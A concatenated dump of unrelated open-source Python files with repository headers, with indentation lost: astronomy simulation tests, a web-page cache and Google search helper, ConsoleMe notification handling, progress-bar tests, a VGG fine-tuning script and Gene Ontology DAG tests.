table = make_base_catalog_galactic(n_sources=10, random_state=0)
table = add_observed_parameters(table)
d = table[0]
assert len(table) == 10
assert len(table.colnames) == 20
assert table["distance"].unit == "pc"
assert_allclose(d["distance"], 13016.572756, atol=1e-5)
assert table["GLON"].unit == "deg"
assert_allclose(d["GLON"], -27.156565, atol=1e-5)
assert table["GLAT"].unit == "deg"
assert_allclose(d["GLAT"], 0.101948, atol=1e-5)
assert table["VGLON"].unit == "deg / Myr"
assert_allclose(d["VGLON"], 0.368166, atol=1e-5)
assert table["VGLAT"].unit == "deg / Myr"
assert_allclose(d["VGLAT"], -0.209514, atol=1e-5)
assert table["RA"].unit == "deg"
assert_allclose(d["RA"], 244.347149, atol=1e-5)
assert table["DEC"].unit == "deg"
assert_allclose(d["DEC"], -50.410142, atol=1e-5)
def test_chain_all():
# Test that running the simulation functions in chain works
table = make_base_catalog_galactic(n_sources=10, random_state=0)
table = add_snr_parameters(table)
table = add_pulsar_parameters(table, random_state=0)
table = add_pwn_parameters(table)
table = add_observed_parameters(table)
d = table[0]
# Note: the individual functions are tested above.
# Here we just run them in a chain and do very basic asserts
# on the output so that we make sure we notice changes.
assert len(table) == 10
assert len(table.colnames) == 34
assert table["r_out_PWN"].unit == "pc"
assert_allclose(d["r_out_PWN"], 1.378224, atol=1e-4)
assert table["RA"].unit == "deg"
assert_allclose(d["RA"], 244.347149, atol=1e-5)
|
tables/wikipedia-scripts/weblib/web.py | yash-srivastava19/sempre | 812 | 12795536 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib, urllib2, urlparse, socket
import json, sys, os, hashlib, subprocess, time
from blacklist import BLACKLIST
BASEDIR = os.path.dirname(os.path.realpath(os.path.join(__file__, '..')))
class WebpageCache(object):
def __init__(self, basedir=BASEDIR, dirname='web.cache', log=True, timeout=15):
self.cachePath = os.path.join(basedir, dirname)
if not os.path.exists(self.cachePath):
os.mkdir(self.cachePath)
self.log = log
self.cache_miss = False
self.timeout = timeout
def get_hashcode(self, url):
return hashlib.sha1(url).hexdigest()
def get_path(self, url, already_hashed=False):
if not already_hashed:
url = self.get_hashcode(url)
return os.path.join(self.cachePath, url)
def get_current_datetime(self):
return time.strftime("%Y-%m-%d-%H-%M-%S", time.gmtime())
def open_in_browser(self, hashcode, browser="firefox"):
path = os.path.join(self.cachePath, hashcode)
subprocess.call([browser, path])
def comment(self, url):
return ' '.join(('<!--', urllib.quote(url),
self.get_current_datetime(), '-->\n'))
def read(self, url, already_hashed=False):
path = self.get_path(url, already_hashed)
if os.path.exists(path):
with open(path) as fin:
error = False
check_url = fin.readline().strip()
if check_url == 'ERROR':
error = True
error_message = fin.readline().strip()
check_url = fin.readline()
if not already_hashed:
tokens = check_url.split()
assert len(tokens) > 2 and tokens[1] == urllib.quote(url), path
if error:
return WebLoadingError(error_message)
else:
return fin.read()
def write(self, url, content, already_hashed=False):
path = self.get_path(url, already_hashed)
with open(path, 'w') as fout:
fout.write(self.comment(url))
fout.write(content)
def write_error(self, url, error, already_hashed=False):
path = self.get_path(url, already_hashed)
with open(path, 'w') as fout:
fout.write('ERROR\n')
fout.write(error.replace('\n', ' ') + '\n')
fout.write(self.comment(url))
def get_page(self, url, force=False, check_html=True):
result = self.read(url)
if result and not force:
self.cache_miss = False
if isinstance(result, WebLoadingError):
if self.log:
print >> sys.stderr, '[ERROR]', result
result = None
else:
self.cache_miss = True
try:
if self.log:
print >> sys.stderr, 'Downloading from', url, '...'
# Check blacklist
parsed_url = urlparse.urlparse(url)
if parsed_url.netloc in BLACKLIST:
raise WebLoadingError('URL %s in blacklist' % url)
# Open web page
opener = urllib2.build_opener()
opener.addheaders = [
('User-agent',
'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0)')]
response = opener.open(url, timeout=self.timeout)
# Check content type to prevent non-HTML
content_type = response.info().type
if check_html and content_type != 'text/html':
raise WebLoadingError("Non-HTML response: %s" %
content_type)
result = response.read()
self.write(url, result)
except Exception, e:
if self.log:
print >> sys.stderr, '[ERROR] ', e
if isinstance(e, (WebLoadingError, urllib2.URLError, socket.error)):
self.write_error(url, str(e.message))
result = None
if self.log:
if self.cache_miss:
print >> sys.stderr, 'Retrieved "%s"' % url
else:
print >> sys.stderr, ('Loaded "%s" from cache (%s)' %
(url, self.get_path(url)))
return result
################################################################
# GOOGLE SUGGEST
GOOGLE_SUGGEST_URL = 'http://suggestqueries.google.com/complete/search?client=firefox&q='
def get_google_suggest_url(self, before, after=''):
answer = self.GOOGLE_SUGGEST_URL + urllib.quote(before) + urllib.quote(after)
if after:
answer += '&cp=' + str(len(before))
return answer
def get_from_google_suggest(self, before, after=''):
url = self.get_google_suggest_url(before, after)
return json.loads(self.get_page(url, check_html=False))[1]
################################################################
# GOOGLE SEARCH -- old API
# The important fields of each result are
# - url (+ unescapedUrl, visibleUrl, cacheUrl)
# - titleNoFormatting (+ title)
# - content
GOOGLE_SEARCH_URL = 'http://ajax.googleapis.com/ajax/services/search/web?v=1.0&rsz=large&q='
def get_google_search_url(self, keyword):
answer = self.GOOGLE_SEARCH_URL + urllib.quote(keyword)
return answer
def get_from_google_search(self, keyword, raw=False):
url = self.get_google_search_url(keyword)
result = self.get_page(url, check_html=False)
if raw:
return result
return json.loads(result)
def get_urls_from_google_search(self, keyword):
results = self.get_from_google_search(keyword)['responseData']['results']
return [(x['unescapedUrl'], x['titleNoFormatting']) for x in results]
GOOGLE_PAUSE = 30
def get_from_google_search_with_backoff(self, keyword):
url = self.get_google_search_url(keyword)
result = self.get_page(url, check_html=False)
while True:
try:
return json.loads(result)['responseData']['results']
except:
# Google nailed me! Exponential backoff!
print >> sys.stderr, ('Hide from Google for %d seconds ...' %
WebpageCache.GOOGLE_PAUSE)
time.sleep(WebpageCache.GOOGLE_PAUSE)
WebpageCache.GOOGLE_PAUSE *= 2
result = self.get_page(url, check_html=False, force=True)
def get_urls_from_google_search_with_backoff(self, keyword):
results = self.get_from_google_search_with_backoff(keyword)
return [(x['unescapedUrl'], x['titleNoFormatting']) for x in results]
################################################################
# GOOGLE SEARCH -- Custom Search
CUSTOM_GOOGLE_SEARCH_URL = 'https://www.googleapis.com/customsearch/'\
'v1?key=%s&cx=%s&alt=json&safe=high&q=%s'
def set_google_custom_search_keys(self, api_key, cx):
self.api_key = api_key
self.cx = cx
def get_google_custom_search_url(self, keyword):
answer = self.CUSTOM_GOOGLE_SEARCH_URL % \
(self.api_key, self.cx, urllib.quote(keyword))
return answer
def get_from_google_custom_search(self, keyword, raw=False):
url = self.get_google_custom_search_url(keyword)
answer = self.get_page(url, check_html=False)
if raw:
return answer
return json.loads(answer)
def get_urls_from_google_custom_search(self, keyword):
results = self.get_from_google_custom_search(keyword)['items']
return [(x['link'], x.get('title', '')) for x in results]
def get_urls_from_google_hybrid_search(self, keyword):
'''Return (cache_path, results)'''
old_url = self.get_google_search_url(keyword)
result = self.read(old_url)
if result and not isinstance(result, WebLoadingError):
# Found result in cache
try:
results = json.loads(result)['responseData']['results']
return (self.get_path(old_url),
[(x['unescapedUrl'], x['titleNoFormatting'])
for x in results])
except:
# Stale bad cache ...
pass
# Use Custom search
return (self.get_path(self.get_google_custom_search_url(keyword)),
self.get_urls_from_google_custom_search(keyword))
class WebLoadingError(Exception):
def __init__(self, msg):
self.args = (msg,)
self.msg = msg
self.message = msg
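# A minimal usage sketch (assumed, not part of the original module): fetch a
# page once over the network, then serve later requests for the same URL from
# the on-disk cache directory.
#
# cache = WebpageCache()
# html = cache.get_page('http://example.com/')   # network fetch, cached to disk
# html = cache.get_page('http://example.com/')   # served from cache; cache_miss is False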
|
src/anyconfig/ioinfo/constants.py | ssato/python-anyconfig | 213 | 12795551 | #
# Copyright (C) 2018 - 2021 <NAME> <<EMAIL>>
# SPDX-License-Identifier: MIT
#
r"""ioinfo.constants to provide global constant variables.
"""
import os.path
GLOB_MARKER: str = '*'
PATH_SEP: str = os.path.sep
# vim:sw=4:ts=4:et:
|
consoleme/lib/v2/notifications.py | shyovn/consoleme | 2,835 | 12795584 | <gh_stars>1000+
import json as original_json
import sys
import time
from collections import defaultdict
from typing import Dict
import sentry_sdk
import ujson as json
from asgiref.sync import sync_to_async
from consoleme.config import config
from consoleme.lib.cache import (
retrieve_json_data_from_redis_or_s3,
store_json_results_in_redis_and_s3,
)
from consoleme.lib.dynamo import UserDynamoHandler
from consoleme.lib.json_encoder import SetEncoder
from consoleme.lib.notifications.models import (
ConsoleMeUserNotification,
GetNotificationsForUserResponse,
)
from consoleme.lib.singleton import Singleton
log = config.get_logger()
class RetrieveNotifications(metaclass=Singleton):
def __init__(self):
self.last_update = 0
self.all_notifications = []
async def retrieve_all_notifications(self, force_refresh=False):
if force_refresh or (
int(time.time()) - self.last_update
> config.get(
"get_notifications_for_user.notification_retrieval_interval", 20
)
):
self.all_notifications = await retrieve_json_data_from_redis_or_s3(
redis_key=config.get("notifications.redis_key", "ALL_NOTIFICATIONS"),
redis_data_type="hash",
s3_bucket=config.get("notifications.s3.bucket"),
s3_key=config.get(
"notifications.s3.key", "notifications/all_notifications_v1.json.gz"
),
default={},
)
self.last_update = int(time.time())
return self.all_notifications
async def get_notifications_for_user(
user,
groups,
max_notifications=config.get("get_notifications_for_user.max_notifications", 5),
force_refresh=False,
) -> GetNotificationsForUserResponse:
function = f"{__name__}.{sys._getframe().f_code.co_name}"
log_data = {
"function": function,
"user": user,
"max_notifications": max_notifications,
"force_refresh": force_refresh,
}
current_time = int(time.time())
all_notifications = await RetrieveNotifications().retrieve_all_notifications(
force_refresh
)
unread_count = 0
notifications_for_user = []
for user_or_group in [user, *groups]:
# Filter out identical notifications that were already captured via user-specific attribution. IE: "UserA"
# performed an access deny operation locally under "RoleA" with session name = "UserA", so the generated
# notification is tied to the user. However, "UserA" is a member of "GroupA", which owns RoleA. We want
# to show the notification to members of "GroupA", as well as "UserA" but we don't want "UserA" to see 2
# notifications.
notifications = all_notifications.get(user_or_group)
if not notifications:
continue
notifications = json.loads(notifications)
for notification_raw in notifications:
try:
# We parse ConsoleMeUserNotification individually instead of as an array
# to account for future changes to the model that may invalidate older
# notifications
notification = ConsoleMeUserNotification.parse_obj(notification_raw)
except Exception as e:
log.error({**log_data, "error": str(e)})
sentry_sdk.capture_exception()
continue
if notification.version != 1:
# Skip unsupported versions of the notification model
continue
if user in notification.hidden_for_users:
# Skip this notification if it isn't hidden for the user
continue
seen = False
for existing_user_notification_raw in notifications_for_user:
existing_user_notification = ConsoleMeUserNotification.parse_obj(
existing_user_notification_raw
)
if (
notification.predictable_id
== existing_user_notification.predictable_id
):
seen = True
if not seen:
notifications_for_user.append(notification)
# Filter out "expired" notifications
notifications_for_user = [
v for v in notifications_for_user if v.expiration > current_time
]
# Show newest notifications first
notifications_for_user = sorted(
notifications_for_user, key=lambda i: i.event_time, reverse=True
)
# Increment Unread Count
notifications_to_return = notifications_for_user[0:max_notifications]
for notification in notifications_to_return:
if user in notification.read_by_users or notification.read_by_all:
notification.read_for_current_user = True
continue
unread_count += 1
return GetNotificationsForUserResponse(
notifications=notifications_to_return, unread_count=unread_count
)
async def fetch_notification(notification_id: str):
ddb = UserDynamoHandler()
notification = await sync_to_async(ddb.notifications_table.get_item)(
Key={"predictable_id": notification_id}
)
if notification.get("Item"):
return ConsoleMeUserNotification.parse_obj(notification["Item"])
async def cache_notifications_to_redis_s3() -> Dict[str, int]:
function = f"{__name__}.{sys._getframe().f_code.co_name}"
current_time = int(time.time())
log_data = {"function": function}
ddb = UserDynamoHandler()
notifications_by_user_group = defaultdict(list)
all_notifications_l = await ddb.parallel_scan_table_async(ddb.notifications_table)
changed_notifications = []
for existing_notification in all_notifications_l:
notification = ConsoleMeUserNotification.parse_obj(existing_notification)
if current_time > notification.expiration:
notification.expired = True
changed_notifications.append(notification.dict())
for user_or_group in notification.users_or_groups:
notifications_by_user_group[user_or_group].append(notification.dict())
if changed_notifications:
ddb.parallel_write_table(ddb.notifications_table, changed_notifications)
if notifications_by_user_group:
for k, v in notifications_by_user_group.items():
notifications_by_user_group[k] = original_json.dumps(v, cls=SetEncoder)
await store_json_results_in_redis_and_s3(
notifications_by_user_group,
redis_key=config.get("notifications.redis_key", "ALL_NOTIFICATIONS"),
redis_data_type="hash",
s3_bucket=config.get("notifications.s3.bucket"),
s3_key=config.get(
"notifications.s3.key", "notifications/all_notifications_v1.json.gz"
),
)
log_data["num_user_groups_for_notifications"] = len(
notifications_by_user_group.keys()
)
log_data["num_notifications"] = len(all_notifications_l)
log.debug(log_data)
return {
"num_user_groups_to_notify": len(notifications_by_user_group.keys()),
"num_notifications": len(all_notifications_l),
}
async def write_notification(notification: ConsoleMeUserNotification):
ddb = UserDynamoHandler()
await sync_to_async(ddb.notifications_table.put_item)(
Item=ddb._data_to_dynamo_replace(notification.dict())
)
await cache_notifications_to_redis_s3()
return True
|
tests/test_percentage_indicator.py | tahmidbintaslim/pyprind | 411 | 12795637 | """
<NAME> 2014-2016
Python Progress Indicator Utility
Author: <NAME> <<EMAIL>>
License: BSD 3 clause
Contributors: https://github.com/rasbt/pyprind/graphs/contributors
Code Repository: https://github.com/rasbt/pyprind
PyPI: https://pypi.python.org/pypi/PyPrind
"""
import sys
import time
import pyprind
n = 100
sleeptime = 0.02
def test_basic_percent():
perc = pyprind.ProgPercent(n)
for i in range(n):
time.sleep(sleeptime)
perc.update()
def test_stdout():
perc = pyprind.ProgPercent(n, stream=sys.stdout)
for i in range(n):
time.sleep(sleeptime)
perc.update()
def test_generator():
for i in pyprind.prog_percent(range(n), stream=sys.stdout):
time.sleep(sleeptime)
def test_monitoring():
perc = pyprind.ProgPercent(n, monitor=True)
for i in range(n):
time.sleep(sleeptime)
perc.update()
print(perc)
def test_item_tracking():
items = ['file_%s.csv' % i for i in range(0, n)]
perc = pyprind.ProgPercent(len(items))
for i in items:
time.sleep(sleeptime)
perc.update(item_id=i)
def test_force_flush():
perc = pyprind.ProgPercent(n)
for i in range(n):
time.sleep(sleeptime)
perc.update(force_flush=True)
def test_update_interval():
perc = pyprind.ProgPercent(n, update_interval=4)
for i in range(n):
time.sleep(sleeptime)
perc.update()
if __name__ == "__main__":
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Basic Percentage Indicator\n')
test_basic_percent()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing stdout Stream\n')
test_stdout()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Percentage Indicator Generator\n')
test_generator()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing monitor function\n')
test_monitoring()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Item Tracking\n')
test_item_tracking()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Force Flush\n')
test_force_flush()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Update Interval\n')
test_update_interval()
|
04_CNN_advances/use_vgg_finetune.py | jastarex/DL_Notes | 203 | 12795640 |
# coding: utf-8
# # Fine-tune a CNN using a pre-trained VGG model
# In[1]:
# Import packs
import numpy as np
import os
import scipy.io
from scipy.misc import imread, imresize
import matplotlib.pyplot as plt
import skimage.io
import skimage.transform
import tensorflow as tf
get_ipython().magic(u'matplotlib inline')
cwd = os.getcwd()
print ("Package loaded")
print ("Current folder is %s" % (cwd) )
# In[2]:
# Download the pre-trained VGG-19 model (Matlab .mat format); it will be read with scipy later
# (note: this model version differs from the latest one at http://www.vlfeat.org/matconvnet/pretrained/)
import os.path
if not os.path.isfile('./data/imagenet-vgg-verydeep-19.mat'):
get_ipython().system(u'wget -O data/imagenet-vgg-verydeep-19.mat http://www.vlfeat.org/matconvnet/models/beta16/imagenet-vgg-verydeep-19.mat')
# # Load images, resize them, and build the dataset
# In[3]:
# Configure the locations of the images and reshaping sizes
# ------------------------------------------------------------------- #
paths = {"images/cats", "images/dogs"}
imgsize = [64, 64] # The reshape size
use_gray = 0 # Grayscale
data_name = "data4vgg" # Save name
valid_exts = [".jpg",".gif",".png",".tga", ".jpeg"]
# ------------------------------------------------------------------- #
imgcnt = 0
nclass = len(paths)
for relpath in paths:
fullpath = cwd + "/" + relpath
flist = os.listdir(fullpath)
for f in flist:
if os.path.splitext(f)[1].lower() not in valid_exts:
continue
fullpath = os.path.join(fullpath, f)
imgcnt = imgcnt + 1
# Grayscale
def rgb2gray(rgb):
    if len(rgb.shape) == 3:
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
else:
print ("Current Image is GRAY!")
return rgb
if use_gray:
totalimg = np.ndarray((imgcnt, imgsize[0]*imgsize[1]))
else:
totalimg = np.ndarray((imgcnt, imgsize[0]*imgsize[1]*3))
totallabel = np.ndarray((imgcnt, nclass))
imgcnt = 0
for i, relpath in zip(range(nclass), paths):
path = cwd + "/" + relpath
flist = os.listdir(path)
for f in flist:
if os.path.splitext(f)[1].lower() not in valid_exts:
continue
fullpath = os.path.join(path, f)
currimg = imread(fullpath)
# Convert to grayscale
if use_gray:
grayimg = rgb2gray(currimg)
else:
grayimg = currimg
# Reshape
graysmall = imresize(grayimg, [imgsize[0], imgsize[1]])/255.
grayvec = np.reshape(graysmall, (1, -1))
# Save
totalimg[imgcnt, :] = grayvec
totallabel[imgcnt, :] = np.eye(nclass, nclass)[i]
imgcnt = imgcnt + 1
# Divide total data into training and test set
randidx = np.random.randint(imgcnt, size=imgcnt)
trainidx = randidx[0:int(4*imgcnt/5)]
testidx = randidx[int(4*imgcnt/5):imgcnt]
trainimg = totalimg[trainidx, :]
trainlabel = totallabel[trainidx, :]
testimg = totalimg[testidx, :]
testlabel = totallabel[testidx, :]
ntrain = trainimg.shape[0]
nclass = trainlabel.shape[1]
dim = trainimg.shape[1]
ntest = testimg.shape[0]
print ("Number of total images is %d (train: %d, test: %d)"
% (imgcnt, ntrain, ntest))
print ("Shape of an image is (%d, %d, %d)" % (imgsize[0], imgsize[1], 3))
# # Define the VGG network structure
# In[4]:
def net(data_path, input_image):
layers = (
'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',
'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',
'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',
'relu3_3', 'conv3_4', 'relu3_4', 'pool3',
'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',
'relu4_3', 'conv4_4', 'relu4_4', 'pool4',
'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',
'relu5_3', 'conv5_4', 'relu5_4'
)
data = scipy.io.loadmat(data_path)
mean = data['normalization'][0][0][0]
mean_pixel = np.mean(mean, axis=(0, 1))
weights = data['layers'][0]
net = {}
current = input_image
for i, name in enumerate(layers):
kind = name[:4]
if kind == 'conv':
kernels, bias = weights[i][0][0][0][0]
# matconvnet: weights are [width, height, in_channels, out_channels]
# tensorflow: weights are [height, width, in_channels, out_channels]
kernels = np.transpose(kernels, (1, 0, 2, 3))
bias = bias.reshape(-1)
current = _conv_layer(current, kernels, bias)
elif kind == 'relu':
current = tf.nn.relu(current)
elif kind == 'pool':
current = _pool_layer(current)
net[name] = current
assert len(net) == len(layers)
return net, mean_pixel
def _conv_layer(input, weights, bias):
conv = tf.nn.conv2d(input, tf.constant(weights), strides=(1, 1, 1, 1),
padding='SAME')
return tf.nn.bias_add(conv, bias)
def _pool_layer(input):
return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),
padding='SAME')
def preprocess(image, mean_pixel):
return image - mean_pixel
def unprocess(image, mean_pixel):
return image + mean_pixel
print ("VGG net ready")
# # Compute convolutional feature maps with VGG
# In[5]:
# Preprocess
trainimg_tensor = np.ndarray((ntrain, imgsize[0], imgsize[1], 3))
testimg_tensor = np.ndarray((ntest, imgsize[0], imgsize[1], 3))
for i in range(ntrain):
currimg = trainimg[i, :]
currimg = np.reshape(currimg, [imgsize[0], imgsize[1], 3])
trainimg_tensor[i, :, :, :] = currimg
print ("Shape of trainimg_tensor is %s" % (trainimg_tensor.shape,))
for i in range(ntest):
currimg = testimg[i, :]
currimg = np.reshape(currimg, [imgsize[0], imgsize[1], 3])
testimg_tensor[i, :, :, :] = currimg
print ("Shape of trainimg_tensor is %s" % (testimg_tensor.shape,))
# Get conv features
VGG_PATH = cwd + "/data/imagenet-vgg-verydeep-19.mat"
with tf.Graph().as_default(), tf.Session() as sess:
with tf.device("/cpu:0"):
img_placeholder = tf.placeholder(tf.float32
, shape=(None, imgsize[0], imgsize[1], 3))
nets, mean_pixel = net(VGG_PATH, img_placeholder)
train_features = nets['relu5_4'].eval(feed_dict={img_placeholder: trainimg_tensor})
test_features = nets['relu5_4'].eval(feed_dict={img_placeholder: testimg_tensor})
print("Convolutional map extraction done")
# # Shape of the convolutional feature maps
# In[6]:
print ("Shape of 'train_features' is %s" % (train_features.shape,))
print ("Shape of 'test_features' is %s" % (test_features.shape,))
# # Vectorize
# In[7]:
# Vectorize
train_vectorized = np.ndarray((ntrain, 4*4*512))
test_vectorized = np.ndarray((ntest, 4*4*512))
for i in range(ntrain):
curr_feat = train_features[i, :, :, :]
curr_feat_vec = np.reshape(curr_feat, (1, -1))
train_vectorized[i, :] = curr_feat_vec
for i in range(ntest):
curr_feat = test_features[i, :, :, :]
curr_feat_vec = np.reshape(curr_feat, (1, -1))
test_vectorized[i, :] = curr_feat_vec
print ("Shape of 'train_vectorized' is %s" % (train_features.shape,))
print ("Shape of 'test_vectorized' is %s" % (test_features.shape,))
# # Define the fine-tuning network structure
# In[8]:
# Parameters
learning_rate = 0.0001
training_epochs = 100
batch_size = 100
display_step = 10
# tf Graph input
x = tf.placeholder(tf.float32, [None, 4*4*512])
y = tf.placeholder(tf.float32, [None, nclass])
keepratio = tf.placeholder(tf.float32)
# Network
with tf.device("/cpu:0"):
n_input = dim
n_output = nclass
weights = {
'wd1': tf.Variable(tf.random_normal([4*4*512, 1024], stddev=0.1)),
'wd2': tf.Variable(tf.random_normal([1024, n_output], stddev=0.1))
}
biases = {
'bd1': tf.Variable(tf.random_normal([1024], stddev=0.1)),
'bd2': tf.Variable(tf.random_normal([n_output], stddev=0.1))
}
def conv_basic(_input, _w, _b, _keepratio):
# Input
_input_r = _input
# Vectorize
_dense1 = tf.reshape(_input_r, [-1, _w['wd1'].get_shape().as_list()[0]])
# Fc1
_fc1 = tf.nn.relu(tf.add(tf.matmul(_dense1, _w['wd1']), _b['bd1']))
_fc_dr1 = tf.nn.dropout(_fc1, _keepratio)
# Fc2
_out = tf.add(tf.matmul(_fc_dr1, _w['wd2']), _b['bd2'])
# Return everything
out = {'input_r': _input_r, 'dense1': _dense1,
'fc1': _fc1, 'fc_dr1': _fc_dr1, 'out': _out }
return out
# Functions!
_pred = conv_basic(x, weights, biases, keepratio)['out']
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=_pred, labels=y))
optm = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
_corr = tf.equal(tf.argmax(_pred,1), tf.argmax(y,1))
accr = tf.reduce_mean(tf.cast(_corr, tf.float32))
init = tf.initialize_all_variables()
print ("Network Ready to Go!")
# # Optimization
# In[9]:
# Launch the graph
sess = tf.Session()
sess.run(init)
# Training cycle
for epoch in range(training_epochs):
avg_cost = 0.
num_batch = int(ntrain/batch_size)+1
# Loop over all batches
for i in range(num_batch):
randidx = np.random.randint(ntrain, size=batch_size)
batch_xs = train_vectorized[randidx, :]
batch_ys = trainlabel[randidx, :]
# Fit training using batch data
sess.run(optm, feed_dict={x: batch_xs, y: batch_ys, keepratio:0.7})
# Compute average loss
avg_cost += sess.run(cost, feed_dict={x: batch_xs, y: batch_ys, keepratio:1.})/num_batch
# Display logs per epoch step
if epoch % display_step == 0:
print ("Epoch: %03d/%03d cost: %.9f" % (epoch, training_epochs, avg_cost))
train_acc = sess.run(accr, feed_dict={x: batch_xs, y: batch_ys, keepratio:1.})
print (" Training accuracy: %.3f" % (train_acc))
test_acc = sess.run(accr, feed_dict={x: test_vectorized, y: testlabel, keepratio:1.})
print (" Test accuracy: %.3f" % (test_acc))
print ("Optimization Finished!")
|
tests/test_gosubdag_relationships_i126.py | flying-sheep/goatools | 477 | 12795691 | #!/usr/bin/env python
"""Test that GoSubDag contains ancestors from only the user-specified relationships"""
# tests/test_gosubdag_relationships_i126.py
# goatools/gosubdag/gosubdag.py
# goatools/gosubdag/godag_rcnt.py
# goatools/gosubdag/godag_rcnt_init.py
# goatools/godag/go_tasks.py
# goatools/obo_parser.py
from __future__ import print_function
__copyright__ = "Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved."
from os.path import join
from os import system
import sys
## import timeit
## import datetime
import collections as cx
from goatools.base import get_godag
from goatools.godag.consts import RELATIONSHIP_SET
from goatools.gosubdag.gosubdag import GoSubDag
from goatools.test_data.wr_subobo import WrSubObo
from tests.utils import REPO
# pylint: disable=line-too-long,unused-variable
def test_gosubdag_relationships(wr_new_obo_subset=False):
"""Test that GoSubDag contains ancestors from only the user-specified relationships"""
# Leaf GO: viral triggering of virus induced gene silencing
goid_chosen = 'GO:0060150'
# Load GODag with all relationships
fin_obo = join(REPO, "tests/data/i126/viral_gene_silence.obo") # "go-basic.obo")
godag_r0 = get_godag(fin_obo, loading_bar=None)
godag_r1 = get_godag(fin_obo, loading_bar=None, optional_attrs=['relationship'])
file_sub = join(REPO, "tests/data/viral_gene_silence.obo")
# Get all GO terms above this low-level GO ID using all relationships
if wr_new_obo_subset:
_wr_sub_obo(file_sub, goid_chosen, godag_r1, fin_obo)
# RELATIONSHIPS: None
gosubdag_r0 = GoSubDag(set([goid_chosen]), godag_r0)
assert len(gosubdag_r0.rcntobj.go2ancestors[goid_chosen]) == 12
# RELATIONSHIPS: ALL
gosubdag_r1 = GoSubDag(set([goid_chosen]), godag_r1, relationships=True)
assert gosubdag_r1.relationships == RELATIONSHIP_SET
#### set(['part_of', 'regulates', 'positively_regulates', 'negatively_regulates'])
assert len(gosubdag_r1.rcntobj.go2ancestors[goid_chosen]) == 50
# RELATIONSHIPS: part_of
gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'})
assert gosubdag_rp.relationships == set(['part_of'])
rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen]
assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj'
assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents'
# RELATIONSHIPS: regulates
gosubdag_rr = GoSubDag(set([goid_chosen]), godag_r1, relationships={'regulates'})
assert gosubdag_rr.relationships == set(['regulates'])
rp_par = gosubdag_rr.rcntobj.go2ancestors[goid_chosen]
# assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj'
# assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents'
# RELATIONSHIPS: positively_regulates
gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'positively_regulates'})
assert gosubdag_rp.relationships == set(['positively_regulates'])
rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen]
# RELATIONSHIPS: negatively_regulates
gosubdag_rn = GoSubDag(set([goid_chosen]), godag_r1, relationships={'negatively_regulates'})
assert gosubdag_rn.relationships == set(['negatively_regulates'])
rp_par = gosubdag_rn.rcntobj.go2ancestors[goid_chosen]
# RELATIONSHIPS: regulates positively_regulates negatively_regulates
regs = {'positively_regulates', 'negatively_regulates'}
gosubdag_rnp = GoSubDag(set([goid_chosen]), godag_r1, relationships=regs)
assert gosubdag_rnp.relationships == regs
rp_par = gosubdag_rnp.rcntobj.go2ancestors[goid_chosen]
_run_baseline_r0(gosubdag_r0, gosubdag_r1)
# BASELINE r1: Test that GOTerm.get_all_upper() is the same as GoSubDag ancestors
for goid, term in gosubdag_r1.go2obj.items():
ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set())
assert ancestors_r1 == term.get_all_upper()
#### # Test that
#### gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'}, prt=sys.stdout)
#### for goid, dag_term in godag_r1.items():
#### if goid in gosubdag_r1.rcntobj.go2ancestors:
#### ancestors = gosubdag_rp.rcntobj.go2ancestors[goid]
#### sub_term = gosubdag_rp.go2obj[goid]
#### reldict = sub_term.relationship.items()
#### # print(goid)
#### # print('DAG', sorted(dag_term.get_all_upper()))
#### # print('SUB', sorted(sub_term.get_all_upper()))
#### # print('ANS', sorted(ancestors))
#### # for rel, pterms in cx.OrderedDict(reldict).items():
#### # print(rel, ' '.join(sorted(o.id for o in pterms)))
#### # print('')
#### print(gosubdag_rp.relationships)
#### #assert 'GO:0016441' not in gosubdag_rp.rcntobj.go2ancestors['GO:0060150']
#### assert 'GO:0016441' in gosubdag_r1.go2nt
#### assert 'GO:0010467' in gosubdag_r1.go2nt
def _run_baseline_r0(gosubdag_r0, gosubdag_r1):
"""BASELINE r0: Test that GOTerm.get_all_parents() == GoSubDag ancestors"""
r1_ancestors_more = set()
# Loop through r0 GO IDs
for goid, term in gosubdag_r0.go2obj.items():
ancestors_r0 = gosubdag_r0.rcntobj.go2ancestors.get(goid, set())
ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set())
assert ancestors_r0 == term.get_all_parents()
assert ancestors_r0.issubset(ancestors_r1)
if len(ancestors_r0) < len(ancestors_r1):
r1_ancestors_more.add(goid)
assert r1_ancestors_more
print('{N} r1 GO terms in GoSubDag have more ancestors than r0'.format(
N=len(r1_ancestors_more)))
